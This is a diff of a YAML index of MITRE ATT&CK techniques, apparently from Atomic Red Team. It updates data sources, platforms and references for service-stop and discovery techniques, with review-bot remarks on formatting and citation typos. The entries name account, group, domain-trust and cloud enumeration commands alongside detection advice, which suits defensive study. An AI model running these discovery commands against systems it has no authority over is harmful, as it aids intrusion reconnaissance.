@@ -45148,40 +47777,43 @@ impact: Externally monitor the availability of services that may be targeted by an Endpoint DoS. x_mitre_data_sources: - - Netflow/Enclave netflow - - Network device logs - - Network intrusion detection system - - Web application firewall logs - - Web logs - - SSL/TLS inspection + - 'Sensor Health: Host Status' + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS + - Google Workspace atomic_tests: [] T1489: technique: + created: '2019-03-29T19:00:55.901Z' + modified: '2021-03-02T22:11:32.017Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: impact + type: attack-pattern id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b description: "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services - can inhibit or stop response to an incident or aid in the adversary's overall - objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer - 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by - disabling individual services of high importance to an organization, such - as MSExchangeIS, which will make Exchange content inaccessible + or processes can inhibit or stop response to an incident or aid in the adversary's + overall objectives to cause damage to the environment.(Citation: Talos Olympic + Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish + this by disabling individual services of high importance to an organization, + such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). 
In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer - 2018) Services may not allow for modification of their data stores while running. - Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) - or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) - on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks - WannaCry Analysis)" + 2018) Services or processes may not allow for modification of their data stores + while running. Adversaries may stop services or processes in order to conduct + [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted + for Impact](https://attack.mitre.org/techniques/T1486) on the data stores + of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)" name: Service Stop created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: @@ -45203,12 +47835,6 @@ impact: url: https://www.secureworks.com/research/wcry-ransomware-analysis description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware Analysis. Retrieved March 26, 2019. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: impact - modified: '2020-07-24T15:36:08.042Z' - created: '2019-03-29T19:00:55.901Z' x_mitre_is_subtechnique: false x_mitre_platforms: - Windows @@ -45218,7 +47844,7 @@ impact: - Administrator - SYSTEM - User - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_detection: |- Monitor processes and command-line arguments to see if critical processes are terminated or stop running. 
@@ -45228,11 +47854,13 @@ impact: Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018) x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring - - Windows Registry - - API monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' + - 'Service: Service Metadata' + - 'Windows Registry: Windows Registry Key Modification' + - 'File: File Modification' + - 'Process: Process Termination' x_mitre_impact_type: - Availability identifier: T1489 @@ -45341,8 +47969,9 @@ impact: x_mitre_detection: Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. x_mitre_data_sources: - - File monitoring - - Application logs + - 'File: File Creation' + - 'File: File Deletion' + - 'File: File Modification' x_mitre_platforms: - Linux - macOS @@ -45386,9 +48015,9 @@ impact: - macOS - Windows x_mitre_data_sources: - - Windows event logs - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Sensor Health: Host Status' x_mitre_permissions_required: - User - Administrator @@ -45589,8 +48218,9 @@ impact: or out-of-band integrity checking may be useful for identifying manipulated data. ' x_mitre_data_sources: - - Packet capture - - Network protocol analysis + - 'Process: OS API Execution' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_platforms: - Linux - macOS 
@@ -45612,41 +48242,46 @@ discovery: - external_id: CAPEC-575 source_name: capec url: https://capec.mitre.org/data/definitions/575.html + - source_name: Elastic - Koadiac Detection with EQL + url: https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql + description: 'Stepanic, D.. (2020, January 13). Embracing offensive tooling: + Building detections against Koadic using EQL. Retrieved November 30, 2020.' object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-09-16T15:10:18.260Z' + modified: '2021-04-14T12:26:11.595Z' created: '2017-05-31T21:31:06.988Z' x_mitre_is_subtechnique: false x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS - Linux - macOS - - Windows - - Office 365 - - Azure AD - - AWS - - GCP - - Azure - - SaaS + - Google Workspace x_mitre_permissions_required: - User x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). 
+ + Monitor for processes that can be used to enumerate user accounts, such as net.exe and net1.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL) x_mitre_data_sources: - - Azure activity logs - - Office 365 account logs - - API monitoring - - Process monitoring - - Process command-line parameters + - 'User Account: User Account Metadata' + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'File: File Access' x_mitre_contributors: + - Daniel Stepanic, Elastic - Microsoft Threat Intelligence Center (MSTIC) - Travis Smith, Tripwire - x_mitre_version: '2.2' + x_mitre_version: '2.3' atomic_tests: [] T1010: technique: @@ -45675,9 +48310,9 @@ discovery: - macOS - Windows x_mitre_data_sources: - - API monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained. @@ -45756,10 +48391,9 @@ discovery: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained. x_mitre_data_sources: - - API monitoring - - File monitoring - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Access' x_mitre_contributors: - Mike Kemmerer x_mitre_version: '1.0' 
@@ -45932,32 +48566,27 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-08-13T16:53:55.390Z' + modified: '2021-03-16T12:54:41.133Z' created: '2020-02-21T21:08:36.570Z' x_mitre_contributors: - Praetorian x_mitre_data_sources: - - Stackdriver logs - - AWS CloudTrail logs - - Azure activity logs - - Office 365 account logs - - Process monitoring - - Process command-line parameters + - 'User Account: User Account Metadata' + - 'Command: Command Execution' x_mitre_permissions_required: - User x_mitre_detection: |- Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery. System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_platforms: - - AWS - - GCP - - Azure - - Office 365 - Azure AD + - Office 365 - SaaS + - IaaS + - Google Workspace atomic_tests: [] T1069.003: technique: @@ -45979,6 +48608,9 @@ discovery: Directory Leaks via Azure. Retrieved October 6, 2019. url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/ source_name: Black Hills Red Teaming MS AD Azure, 2018 + - source_name: Google Cloud Identity API Documentation + url: https://cloud.google.com/identity/docs/reference/rest + description: Google. (n.d.). Retrieved March 16, 2021. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 
@@ -45988,38 +48620,34 @@ discovery: With authenticated access there are several tools that can be used to find permissions groups. The Get-MsolRole PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts.(Citation: Microsoft Msolrole)(Citation: GitHub Raindance) - Azure CLI (AZ CLI) also provides an interface to obtain permissions groups with authenticated access to a domain. The command az ad user get-member-groups will list groups associated to a user account.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) + Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command az ad user get-member-groups will list groups associated to a user account for Azure while the API endpoint GET https://cloudidentity.googleapis.com/v1/groups lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) id: attack-pattern--16e94db9-b5b1-4cd0-b851-f38fbd0a70f2 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-10-08T17:34:39.077Z' + modified: '2021-03-30T12:42:46.315Z' created: '2020-02-21T21:15:33.222Z' x_mitre_data_sources: - - GCP audit logs - - Stackdriver logs - - AWS CloudTrail logs - - Azure activity logs - - Office 365 account logs - - API monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Group: Group Enumeration' + - 'Group: Group Metadata' + - 'Application Log: Application Log Content' x_mitre_permissions_required: - User x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. 
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Activity and account logs for the cloud services can also be monitored for suspicious commands that are anomalous compared to a baseline of normal activity. - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_platforms: - - Office 365 - Azure AD - - GCP + - Office 365 - SaaS - - Azure - - AWS + - IaaS + - Google Workspace atomic_tests: [] T1580: technique: @@ -46064,11 +48692,11 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-09-17T16:41:23.267Z' + modified: '2021-03-08T10:33:02.163Z' created: '2020-08-20T17:51:25.671Z' x_mitre_contributors: - Praetorian - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: false x_mitre_permissions_required: - User @@ -46080,14 +48708,16 @@ discovery: or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones. x_mitre_data_sources: - - GCP audit logs - - Stackdriver logs - - AWS CloudTrail logs - - Azure activity logs + - 'Instance: Instance Metadata' + - 'Instance: Instance Enumeration' + - 'Snapshot: Snapshot Metadata' + - 'Snapshot: Snapshot Enumeration' + - 'Cloud Storage: Cloud Storage Metadata' + - 'Cloud Storage: Cloud Storage Enumeration' + - 'Volume: Volume Metadata' + - 'Volume: Volume Enumeration' x_mitre_platforms: - - AWS - - Azure - - GCP + - IaaS atomic_tests: [] T1538: technique: 
@@ -46116,7 +48746,7 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-07-14T19:19:00.966Z' + modified: '2021-03-16T12:56:36.098Z' created: '2019-08-30T18:11:24.582Z' x_mitre_is_subtechnique: false x_mitre_detection: 'Monitor account activity logs to see actions performed and 
@@ -46124,50 +48754,21 @@ discovery: providers, such as AWS, provide distinct log events for login attempts to the management console.(Citation: AWS Console Sign-in Events)' x_mitre_data_sources: - - Office 365 audit logs - - Azure activity logs - - Stackdriver logs - - AWS CloudTrail logs + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' x_mitre_permissions_required: - User - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_contributors: - Praetorian x_mitre_platforms: - - AWS - - GCP - - Azure - Azure AD - Office 365 + - IaaS + - Google Workspace atomic_tests: [] T1526: technique: - created: '2019-08-30T13:01:10.120Z' - modified: '2020-06-23T14:31:41.758Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern - id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db - description: "An adversary may attempt to enumerate the cloud services running - on a system after gaining access. These methods can differ from platform-as-a-service - (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). - Many services exist throughout the various cloud providers and can include - Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, - Azure AD, etc. \n\nAdversaries may attempt to discover information about the - services enabled throughout the environment. 
Azure tools and APIs, such as - the Azure AD Graph API and Azure Resource Manager API, can enumerate resources - and services, including applications, management groups, resources and policy - definitions, and their relationships that are accessible by an identity.(Citation: - Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nStormspotter - is an open source tool for enumerating and constructing a graph for Azure - resources and services, and Pacu is an open source AWS exploitation framework - that supports several methods for discovering cloud services.(Citation: Azure - - Stormspotter)(Citation: GitHub Pacu)" - name: Cloud Service Discovery - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1526 
@@ -46188,28 +48789,114 @@ discovery: url: https://github.com/RhinoSecurityLabs/pacu description: Rhino Security Labs. (2019, August 22). Pacu. Retrieved October 17, 2019. - x_mitre_platforms: - - AWS - - GCP - - Azure - - Azure AD - - Office 365 - - SaaS - x_mitre_contributors: - - Suzy Schapperle - Microsoft Azure Red Team - - Praetorian - x_mitre_permissions_required: - - User - x_mitre_version: '1.1' - x_mitre_data_sources: - - Azure activity logs - - Stackdriver logs - - AWS CloudTrail logs + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Cloud Service Discovery + description: "An adversary may attempt to enumerate the cloud services running + on a system after gaining access. These methods can differ from platform-as-a-service + (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). + Many services exist throughout the various cloud providers and can include + Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, + Azure AD, etc. \n\nAdversaries may attempt to discover information about the + services enabled throughout the environment. 
Azure tools and APIs, such as + the Azure AD Graph API and Azure Resource Manager API, can enumerate resources + and services, including applications, management groups, resources and policy + definitions, and their relationships that are accessible by an identity.(Citation: + Azure - Resource Manager API)(Citation: Azure AD Graph API)\n\nStormspotter + is an open source tool for enumerating and constructing a graph for Azure + resources and services, and Pacu is an open source AWS exploitation framework + that supports several methods for discovering cloud services.(Citation: Azure + - Stormspotter)(Citation: GitHub Pacu)" + id: attack-pattern--e24fcba8-2557-4442-a139-1ee2f2e784db + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-03-16T12:57:03.837Z' + created: '2019-08-30T13:01:10.120Z' + x_mitre_is_subtechnique: false x_mitre_detection: |- Cloud service discovery techniques will likely occur throughout an operation where an adversary is targeting cloud-based systems and services. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained. Normal, benign system and network events that look like cloud service discovery may be uncommon, depending on the environment and how they are used. Monitor cloud service usage for anomalous behavior that may indicate adversarial presence within the environment. 
+ x_mitre_data_sources: + - 'Cloud Service: Cloud Service Metadata' + - 'Cloud Service: Cloud Service Enumeration' + x_mitre_version: '1.2' + x_mitre_permissions_required: + - User + x_mitre_contributors: + - Suzy Schapperle - Microsoft Azure Red Team + - Praetorian + x_mitre_platforms: + - Azure AD + - Office 365 + - SaaS + - IaaS + - Google Workspace + atomic_tests: [] + T1613: + technique: + external_references: + - source_name: mitre-attack + external_id: T1613 + url: https://attack.mitre.org/techniques/T1613 + - source_name: Docker API + url: https://docs.docker.com/engine/api/v1.41/ + description: Docker. (n.d.). Docker Engine API v1.41 Reference. Retrieved + March 31, 2021. + - source_name: Kubernetes API + url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/ + description: The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved + March 29, 2021. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Container and Resource Discovery + description: "Adversaries may attempt to discover containers and other resources + that are available within a containers environment. Other resources may include + images, deployments, pods, nodes, and other information such as the status + of a cluster.\n\nThese resources can be viewed within web applications such + as the Kubernetes dashboard or can be queried via the Docker and Kubernetes + APIs.(Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may + leak information about the environment, such as the environment’s configuration, + which services are available, and what cloud provider the victim may be utilizing. + The discovery of these resources may inform an adversary’s next steps in the + environment, such as how to perform lateral movement and which methods to + utilize for execution. 
" + id: attack-pattern--0470e792-32f8-46b0-a351-652bc35e9336 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-12T18:22:05.737Z' + created: '2021-03-31T14:26:00.848Z' + x_mitre_contributors: + - Vishwas Manral, McAfee + - Center for Threat-Informed Defense (CTID) + - Yossi Weizman, Azure Defender Research Team + x_mitre_version: '1.0' x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + x_mitre_detection: "Establish centralized logging for the activity of container + and Kubernetes cluster components. This can be done by deploying logging agents + on Kubernetes nodes and retrieving logs from sidecar proxies for application + pods to detect malicious activity at the cluster level.\n\nMonitor logs for + actions that could be taken to gather information about container infrastructure, + including the use of discovery API calls by new or unexpected users. Monitor + account activity logs to see actions performed and activity associated with + the Kubernetes dashboard and other web applications. " + x_mitre_platforms: + - Containers + x_mitre_data_sources: + - 'Cluster: Cluster Metadata' + - 'Container: Container Enumeration' + - 'Container: Container Metadata' + - 'Pod: Pod Enumeration' + - 'Pod: Pod Metadata' + - 'Application Log: Application Log Content' atomic_tests: [] T1087.002: technique: @@ -46236,9 +48923,8 @@ discovery: modified: '2020-03-26T13:42:34.402Z' created: '2020-02-21T21:08:26.480Z' x_mitre_data_sources: - - API monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_permissions_required: - User x_mitre_detection: | 
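Review bot: In the @@ -46188 hunk, both quoted scalars of the new T1613 entry carry a trailing space before the closing quote (the description ends `utilize for execution. "` and x_mitre_detection ends `other web applications. "`); a YAML double-quoted string preserves that space, so it ends up in the generated markdown. Strip trailing whitespace when the generator serialises STIX text, or fix it in the upstream data. The rest of this hunk is the T1526 block re-emitted in a new key order with its text unchanged; the only real changes are x_mitre_platforms (AWS, GCP and Azure collapsed to IaaS, with Google Workspace added), x_mitre_data_sources, and x_mitre_version 1.1 to 1.2.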
@@ -46473,9 +49159,8 @@ discovery: modified: '2020-03-12T19:07:53.043Z' created: '2020-02-21T21:15:06.561Z' x_mitre_data_sources: - - API monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_permissions_required: - User x_mitre_detection: |- @@ -46707,10 +49392,10 @@ discovery: Monitor processes and command-line arguments for actions that could be taken to gather system and network information, such as `nltest /domain_trusts`. Remote access tools with built-in features may interact directly with the Windows API to gather information. Look for the `DSEnumerateDomainTrusts()` Win32 API call to spot activity associated with [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as [PowerShell](https://attack.mitre.org/techniques/T1059/001). The .NET method `GetAllTrustRelationships()` can be an indicator of [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Microsoft GetAllTrustRelationships) x_mitre_data_sources: - - PowerShell logs - - API monitoring - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' + - 'Script: Script Execution' x_mitre_contributors: - Dave Westgard - Elia Florio, Microsoft 
@@ -46863,10 +49548,13 @@ discovery: url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6, 2019. - - source_name: Black Hills Attacking Exchange MailSniper, 2016 - url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/ - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper. + - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper. Retrieved October 6, 2019. + url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/ + source_name: Black Hills Attacking Exchange MailSniper, 2016 + - source_name: Google Workspace Global Access List + url: https://support.google.com/a/answer/166870?hl=en + description: Google. (n.d.). Retrieved March 16, 2021. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 
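Review bot: In the @@ -46863 hunk, the new reference `source_name: Google Workspace Global Access List` names a global access list while the technique text it supports is about the global address list (GAL), and its description `Google. (n.d.). Retrieved March 16, 2021.` carries no title. Both come from the upstream STIX data, so fix them there, and note that source_name is also the key used by the `(Citation: Google Workspace Global Access List)` marker in the description, so a rename has to touch both places or it leaves a dangling citation. The Black Hills reference in the same hunk is removed and re-added with identical content in a different key order (description, url, source_name instead of source_name, url, description), which is diff noise rather than a change.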
@@ -46875,28 +49563,30 @@ discovery: Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists) In on-premises Exchange and Exchange Online, theGet-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016) + + In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List) id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-03-26T15:27:58.933Z' + modified: '2021-03-31T13:10:46.302Z' created: '2020-02-21T21:08:33.237Z' x_mitre_data_sources: - - Office 365 account logs - - Process monitoring - - Process command-line parameters + - 'User Account: User Account Metadata' + - 'Command: Command Execution' x_mitre_permissions_required: - User x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. 
Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - Windows - Office 365 + - Google Workspace atomic_tests: [] T1083: technique: @@ -46932,9 +49622,9 @@ discovery: x_mitre_is_subtechnique: false x_mitre_version: '1.3' x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained. 
@@ -47037,12 +49727,53 @@ discovery: find . -type f -name ".*" cleanup_command: 'rm #{output_file}' name: sh + T1016.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1016.001 + url: https://attack.mitre.org/techniques/T1016/001 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Internet Connection Discovery + description: |- + Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert, and GET requests to websites. + + Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers. + id: attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-03-25T17:03:26.632Z' + created: '2021-03-17T15:28:10.689Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: |- + System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Command and Control, based on the information obtained. + + Monitor processes and command-line arguments for actions that could be taken to check Internet connectivity. 
+ x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_platforms: + - Windows + - Linux + - macOS + atomic_tests: [] T1087.001: technique: external_references: - source_name: mitre-attack external_id: T1087.001 url: https://attack.mitre.org/techniques/T1087/001 + - source_name: Elastic - Koadiac Detection with EQL + url: https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql + description: 'Stepanic, D.. (2020, January 13). Embracing offensive tooling: + Building detections against Koadic using EQL. Retrieved November 30, 2020.' object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 
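Review bot: In the @@ -47037 hunk, the new reference key `Elastic - Koadiac Detection with EQL` misspells the tool named in its own description (`Building detections against Koadic using EQL`); the same key is reused for T1018 later in this patch and in the `(Citation: ...)` markers added to x_mitre_detection, so correct it upstream in every place at once, since a key that no longer matches its marker renders as an unresolved citation. The new T1016.001 entry in the same hunk lands with `atomic_tests: []`, which is expected for a freshly imported sub-technique but deserves a tracking issue so it does not stay empty.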
@@ -47056,19 +49787,23 @@ discovery: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-03-20T19:39:59.544Z' + modified: '2021-04-13T21:39:08.728Z' created: '2020-02-21T21:07:55.393Z' + x_mitre_contributors: + - Daniel Stepanic, Elastic x_mitre_data_sources: - - API monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Access' x_mitre_permissions_required: - User x_mitre_detection: |- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). - x_mitre_version: '1.0' + + Monitor for processes that can be used to enumerate user accounts, such as net.exe and net1.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL) + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - Linux 
@@ -47302,9 +50037,8 @@ discovery: Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). x_mitre_data_sources: - - API monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS @@ -47351,12 +50085,6 @@ discovery: name: powershell T1046: technique: - created: '2017-05-31T21:30:43.915Z' - modified: '2020-03-11T19:55:53.828Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern id: attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Network Service Scanning @@ -47377,13 +50105,18 @@ discovery: url: https://capec.mitre.org/data/definitions/300.html object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-09T14:56:26.562Z' + created: '2017-05-31T21:30:43.915Z' x_mitre_platforms: - - Linux - Windows + - IaaS + - Linux - macOS - - AWS - - GCP - - Azure + - Containers x_mitre_permissions_required: - Administrator - SYSTEM 
